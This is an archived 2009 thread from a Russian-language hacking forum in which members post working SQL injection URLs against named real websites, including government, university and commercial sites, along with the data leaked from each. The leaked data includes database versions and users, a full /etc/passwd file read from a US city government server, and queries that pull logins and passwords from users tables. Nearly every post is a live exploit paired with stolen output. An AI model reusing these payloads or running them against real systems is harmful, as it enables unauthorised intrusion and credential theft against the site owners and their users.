ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10471  
Старый 20.08.2009, 01:18
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

http://www.thlib.org/avarch/mediaflowcat/staffmember_details.php?id=354+union+select+1,2,co ncat(0x3a,version(),database(),user()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+limit+1,1/*


5.0.45dln4n_mediaflowcat_utf8dln4n@sds3.itc.Virgin ia.EDU
 
Ответить с цитированием

  #10472  
Старый 20.08.2009, 02:40
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.blackcd.ru/php/content.php?id=-5746'+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,17/*
Database Version: 5.0.32-Debian_7etch10-log
Database name: leontyev_blcd
User name: leontyev_blcd@77.221.130.5
 
Ответить с цитированием

  #10473  
Старый 20.08.2009, 12:04
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

.gov
Код:
http://www.winchesterva.gov/news.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8
Код:
root@localhost:winccms:4.1.20
Код:
http://www.winchesterva.gov/news.php?id=-1+union+select+1,load_file(0x2F6574632F706173737764),3,4,5,6,7,8
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pop:x:100:12:Qpopper:/var/spool/mail:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
admin:x:500:100:Administrator:/home/.users/112/admin:/bin/bash
root-admin:x:0:0::/root:/bin/bash
 
Ответить с цитированием

  #10474  
Старый 20.08.2009, 12:23
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

Код:
http://www.yangshuo.gov.cn/tv/article.php?id=973+and+substring(version(),1,1)=4
Код:
http://www.harrisburgu.net/news/article.php?id=-453+union+select+1,unhex(hex(version())),3,4,5--
4.1.18-nt

Код:
http://www.sonarbangladesh.com/article.php?ID=973+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #10475  
Старый 20.08.2009, 13:22
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

tlf
=) гы
Цитата:
http://www.universityofcalifornia.edu/cme/listing.php?event_id=-1414+UNION+SELECT+1,2,upwd,4,5,6,7,8,9,ulogin,11,1 2,13,14,15,16,17,18,19,20,21,uname,23,24,25,26,27+ FROM+users/*
Version: 4.1.13-standard-log
User uccme@klamath-vhost.ucop.edu
Db: cmesite

-------------------------------------------------------
Цитата:
http://awis.npaci.edu/calendar/eventdetails.php?event_id=479
Version: 5.0.51a-log
User: awis_admin@web0.sdsc.edu
Db awis

Последний раз редактировалось $n@ke; 20.08.2009 в 13:26..
 
Ответить с цитированием

  #10476  
Старый 20.08.2009, 15:56
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.f-concord.com/history.php?year=2007+union+select+1,2,3,4,5,passw ord,7,8,login,concat_ws(0x3a,user(),version(),data base()),11,12+from+users--&month=10
fconcord_fconcor@localhost
4.1.22-standard
fconcord_fconcord
 
Ответить с цитированием

  #10477  
Старый 20.08.2009, 16:56
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR3
Код:
http://www.sportsarok.hu/index.php?id=-34+union+select+1,2/*
jateksarokhu@localhost:5.0.32-Debian_7etch10-log:jateksarokhu2
 
Ответить с цитированием

  #10478  
Старый 20.08.2009, 20:53
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Хлам (5й мускул, вывод в редиректе)
http://vduplo.ru/redirect/?id=-1+union+select+1,2,3,(select+group_concat(table_na me)+AS+url+from+information_schema.tables+WHERE+ta ble_schema=0x6131393131355f31)+--+

Хлам (4й мускул)
http://drochim.net/main.php?cat=13%60+where+id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7+--+&page=0

Последний раз редактировалось BlackSun; 20.08.2009 в 21:44..
 
Ответить с цитированием

  #10479  
Старый 20.08.2009, 21:19
fraIzer
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551

Репутация: 13
По умолчанию

Код:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(column_name+separator+0x0a),5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name='users'--
Код:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),table_schema,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name='users'--
Код:
http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(concat_ws(0x3a3a3a3a,id,username,password)+separator+0x0a),5,6,7,8,9,10,11,12,13+from+boating.users--
==============

Последний раз редактировалось jokester; 20.08.2009 в 23:09.. Причина: хеши
 
Ответить с цитированием

  #10480  
Старый 20.08.2009, 21:34
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Adult Site Review & Ranking

Цитата:
http://adultsiteranking.com/siteInfo.asp?s_idx=(select+@@version)
Код:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 15 (пользователей: 0 , гостей: 15)
 


Быстрый переход




ANTICHAT.XYZ